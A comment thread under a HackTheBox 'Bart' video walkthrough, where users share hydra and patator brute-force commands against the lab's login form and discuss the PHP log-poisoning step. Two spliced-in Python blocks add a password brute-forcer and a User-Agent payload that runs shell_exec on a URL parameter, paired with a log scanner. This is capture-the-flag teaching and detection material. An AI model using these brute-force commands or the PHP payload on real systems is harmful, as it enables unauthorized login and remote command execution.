HackTheBox - Bart

32,939 views

IppSec

a day ago

Comments: 63
@pswalia2u 3 years ago
Hashcat: cracking hashes with salts :) is just awesome!
@shankaranarayana6568 4 years ago
You can use regular expressions in hydra to capture multiple failure cases. Something like hydra -l harvey -P /usr/share/wordlists/rockyou.txt internal-01.bart.htb http-form-post "/simple_chat/login.php:uname=^USER^&passwd=^PASS^&submit=Login:Invalid Username or Password|The Password must be at least 8 characters"
@shankaranarayana6568 4 years ago
But this way you will have to make sure you capture all possible error messages. I missed out the "password is required" error message earlier on. But not sure why hydra makes an attempt without a password.
@shankaranarayana6568 4 years ago
The final command that worked is hydra -l harvey -P /usr/share/metasploit-framework/data/wordlists/common_roots.txt internal-01.bart.htb http-form-post "/simple_chat/login.php:uname=^USER^&passwd=^PASS^&submit=Login:Invalid Username or Password|The Password must be at least 8 characters|The Password is required"
@robinhellsten8903 6 years ago
Patator equivalent of the hydra stuff: patator http_fuzz url=internal-01.bart.htb/simple_chat/login.php method=POST body='uname=harvey&passwd=FILE0&submit=Login' 0=/usr/share/wordlists/metasploit/common_roots.txt -x ignore:size=365
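Added example, not code from the video or from any commenter. The hydra and patator commands above all hinge on one thing: the login page answers a wrong guess with one of several different messages, and a tool that only knows some of them reports a false hit (the commenter's first run missed "The Password is required", and hydra's empty-password attempt then looked like a success). The script below makes that concrete offline. The host, path, form fields and the three error strings are taken from the comments; the mock login it runs against, and the credential that mock accepts, are constructed here and are not the real box's.

```python
"""Dictionary attack against a login form with several distinct failure messages.

Added example, not the video's or a commenter's code. Target details come from
the comments above; the mock server and its credential are constructed.
"""
import re
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional

TARGET = "http://internal-01.bart.htb/simple_chat/login.php"

# The complete failure set. hydra's http-post-form takes this as the regex after
# the third ':'; patator's -x ignore:fgrep=... or ignore:size=... plays the same role.
FAILURE_RE = re.compile(
    r"Invalid Username or Password"
    r"|The Password must be at least 8 characters"
    r"|The Password is required")

# What the second hydra comment started with: the third message is missing.
INCOMPLETE_FAILURE_RE = re.compile(
    r"Invalid Username or Password|The Password must be at least 8 characters")


def is_failure(body: str, failure_re=FAILURE_RE,
               baseline_len: Optional[int] = None) -> bool:
    """Classify a response as a rejected login.

    First signal: one of the known failure strings. Second signal, what
    patator's ignore:size=N does: a body whose length equals a known-bad baseline.
    """
    if failure_re.search(body):
        return True
    return baseline_len is not None and len(body) == baseline_len


def http_attempt(user: str, password: str) -> str:
    """Real-target variant (not exercised offline): POST the form, return the body."""
    data = urllib.parse.urlencode(
        {"uname": user, "passwd": password, "submit": "Login"}).encode()
    req = urllib.request.Request(TARGET, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def brute_force(attempt: Callable[[str, str], str], user: str,
                passwords: Iterable[str], failure_re=FAILURE_RE,
                baseline_len: Optional[int] = None) -> Optional[str]:
    """Return the first password whose response is not classified as a failure."""
    for pw in passwords:
        if not is_failure(attempt(user, pw), failure_re, baseline_len):
            return pw
    return None


# ---- constructed mock of the login page, only so the script runs offline ----
_MOCK_USERS = {"harvey": "Passw0rd!"}   # assumed credential, not the real one


def mock_attempt(user: str, password: str) -> str:
    """Mimics the three error messages the comments list, in the order a
    length-checking login form would emit them."""
    if password == "":
        return "<p>The Password is required</p>"
    if len(password) < 8:
        return "<p>The Password must be at least 8 characters</p>"
    if _MOCK_USERS.get(user) != password:
        return "<p>Invalid Username or Password</p>"
    return "<p>Welcome, %s</p>" % user


if __name__ == "__main__":
    guesses = ["", "admin", "password", "Passw0rd!"]
    # With the incomplete regex the empty password is reported as valid: a false positive.
    print("incomplete set:", repr(brute_force(mock_attempt, "harvey", guesses, INCOMPLETE_FAILURE_RE)))
    print("complete set:  ", repr(brute_force(mock_attempt, "harvey", guesses)))
```

Swap `mock_attempt` for `http_attempt` to run it against a real form; if you prefer the size-based filter, first send a deliberately wrong guess, note the body length, and pass it as `baseline_len`.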
@abhishekchaudhari970 6 years ago
Thanks... keep it going. We are learning a lot from you 😘
@letsberealq 6 years ago
Thanks for this. I started the box right before it retired. Also, for a hydra post-form example you can use hydra -U http-post-form and it spits out the formats. You should consider Patreon, I'd support it for your work.
@ippsec 6 years ago
I’ve considered it, in the end I just don’t want to deal with being obligated to do videos/answer questions/etc. It becomes actual work once I accept money, and work tends to not be as fun.
@letsberealq 6 years ago
totally get that. Thanks for all that you do!
@_crys_ 6 years ago
Great vid! On this box, you can also use PowerShell's Invoke-Command to run commands as the admin; the catch is that you have to do -ComputerName 127.0.0.1 for it to work. Also, maybe you can do Enter-PSSession as well, but that shell was a bit funky for me, as it didn't execute anything, it just kept giving me the prompt.
@gazcbm 6 years ago
Confused how the leap was made from the log poisoning using PHP in the User-Agent to adding a new parameter with PowerShell.
@ippsec 6 years ago
A new parameter wasn't added with PowerShell. The web application was written in PHP and PHP code was placed in the log file. The PHP code pulled a new variable from the URL and executed it; that's where the PowerShell was placed.
@gazcbm 6 years ago
@IppSec sorry, yes, I meant a new URL parameter that contained a PowerShell command to be executed. In the video the PHP code was running whoami from the UA string; you then replaced the UA string with generic text and added &pleasesubscribe=(powershell stuff here).
@ippsec 6 years ago
At 34:10, the PHP code accepts any command.
@gazcbm 6 years ago
@IppSec yep, there it is! Missed that completely, makes sense. Thanks dude.
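Added example, not code from the video or from any commenter. The exchange above describes the two halves of the technique: PHP code sent in the User-Agent header lands in a log the PHP application later includes, and that code runs whatever arrives in an extra URL parameter (pleasesubscribe). The script below shows the payload shape that gives and, on the defender's side, a check that walks a web log and flags both stages: the entry carrying PHP in the User-Agent, and any later request from the same client that supplies the parameter the payload reads. Assumptions: the payload form, the Apache combined log format, the /log.php path and every sample line are constructed here; the real box's log format and LFI parameter are not shown on this page.

```python
"""Log-poisoning payload shape plus a log scanner that spots the poison and the trigger.

Added example, not the video's or a commenter's code. Log format, paths and
sample lines are constructed; the payload shape is an assumption.
"""
import re
from typing import Dict, List, Optional, Set
from urllib.parse import parse_qs, urlsplit


def build_poison_ua(param: str = "pleasesubscribe") -> str:
    """User-Agent value that, once written to a log PHP later includes, runs
    whatever the named query parameter holds (assumed payload shape)."""
    return "<?php echo shell_exec($_GET['%s']); ?>" % param


# Apache combined log format (assumption: the real box's format is not on this page).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# Parameter names a payload reads, e.g. $_GET['pleasesubscribe'].
PARAM_RE = re.compile(r"""\$_(?:GET|POST|REQUEST)\[['"]([^'"]+)['"]\]""")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_poisoned(lines) -> List[dict]:
    """Flag entries with PHP in the User-Agent, then later requests from the
    same client that carry the parameter those payloads read (the trigger)."""
    findings: List[dict] = []
    armed: Dict[str, Set[str]] = {}      # client ip -> parameter names seen in its payloads
    for n, line in enumerate(lines, 1):
        e = parse_line(line)
        if e is None:
            continue
        if PHP_TAG_RE.search(e["ua"]):
            armed.setdefault(e["ip"], set()).update(PARAM_RE.findall(e["ua"]))
            findings.append({"line": n, "kind": "php_in_ua", "ip": e["ip"], "ua": e["ua"]})
            continue
        qs = parse_qs(urlsplit(e["target"]).query)   # URL-decodes the command
        for p in sorted(armed.get(e["ip"], ())):
            if p in qs:
                findings.append({"line": n, "kind": "trigger", "ip": e["ip"],
                                 "param": p, "command": qs[p][0]})
    return findings


# Constructed sample log: a benign hit, the poisoning request, then the trigger
# with a generic User-Agent and the command in the new parameter.
SAMPLE_LOG = """\
10.10.14.2 - - [01/Jan/2018:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.2 - - [01/Jan/2018:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "<?php echo shell_exec($_GET['pleasesubscribe']); ?>"
10.10.14.2 - - [01/Jan/2018:10:00:09 +0000] "GET /log.php?pleasesubscribe=powershell%20-c%20whoami HTTP/1.1" 200 640 "-" "Mozilla/5.0 generic text"
"""


if __name__ == "__main__":
    print("poison UA:", build_poison_ua())
    for f in find_poisoned(SAMPLE_LOG.splitlines()):
        print(f)
```

Run over a real access log the scanner reports the poisoning line first and the trigger second, so the decoded `command` field is what to pivot on during response; a `<?php` tag in any User-Agent is already worth an alert on its own.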
@blackcat.mb.999 6 years ago
I love all your videos :)
@fsacer 6 years ago
Sysnative is a virtual folder, a special alias, that can be used to access the 64-bit System32 folder from a 32-bit application or script. That's why it won't be displayed, because it's an alias and not a real folder. Maybe you could've run the 64-bit PowerShell from the start, but I don't think I've explored that; iirc I've run a 64-bit meterp.
@chefsputnik1 6 years ago
Aliases have always been visible both via Explorer and cmd. 'Sysnative' is a HIDDEN alias, another stupid M$ peculiarity.
@d4rkz3n64 6 years ago
Nice bro! One hint: use Parcellite to save the history of Ctrl+C to make it easier.
@rubyrose6869 6 years ago
Our race needs more beings like you
@franciscog7110 6 years ago
Nice video, I had it all to finish this machine but failed logging in as admin with the autologon creds. It was a fun machine. By the way, why don't you use the Burp extension CSRF Token Tracker or, if you're feeling fancy, a Burp session macro? No need for scripting and it's crazy fast to use. Nice channel, kudos.
@ippsec 6 years ago
I believe that's a paid feature and I try to stick with free stuff so everyone can follow along.
@yassineamor9300 6 years ago
Thank you for these contributions you make to the community, IppSec. Would you mind sharing the path you took to gain these skills? Any formal education? Online courses? Certs?
@ippsec 6 years ago
Primarily years as a sysadmin and just playing around with things to figure out how they worked.
@pjsmith4471 6 years ago
To force your browser not to use the cache, do Shift+F5.
@adamziane 6 years ago
You should write a book
@Flyingnobull 6 years ago
Ipp, what are you looking for when looking through the page code around the 10th minute?
@zn1x.gaming 6 years ago
Can you please share the list of scripts that you have under /opt ?
@ippsec 6 years ago
Sorry. I don't make that public; it changes weekly and I don't want to risk accidentally uploading something like an Empire database that contains creds to RastaLabs.
@peytpeyt9113 6 years ago
You are the best!! Love u
@m3lk0r83 6 years ago
Great video as usual. Does anyone know why all those techniques failed?
@s1ked_416 10 months ago
What do you mean, "does anyone know why all those techniques failed"? He explains why in the video lol
@m3lk0r83 10 months ago
@s1ked_416 yeah, but do you know why they failed?
@s1ked_416 10 months ago
@m3lk0r83 -_- just watch the video again lol. Also, it's been 5 years since you posted your comment, you should know the answer by now lol
@m3lk0r83 10 months ago
@s1ked_416 I've been trying to figure it out for the last 5 years lol. Do you know why they failed?
@milesjake2067 6 years ago
Just flush the DNS cache.
@abeaugustijn 6 years ago
What's your Mozilla extension for proxies?
@hokkaido8611 6 years ago
@Abe FoxyProxy
@-Giuseppe 6 years ago
FoxyProxy Standard
@s1ked_416 10 months ago
FoxyProxy FTW
@j4ck_d4niels 5 years ago
You should write a book :)
@zwilliams1340 6 years ago
Thank you. 10/10
@prohat7674 6 years ago
Can I use this IP for training? I can only try on the free server.
@ippsec 6 years ago
Retired machines stay on the free server for two weeks.
@prohat7674 6 years ago
@IppSec aha, okay man, thanks
@mahmedahmedmansour 6 years ago
Thanks so much bro
@sowhatsupeirik 6 years ago
ilu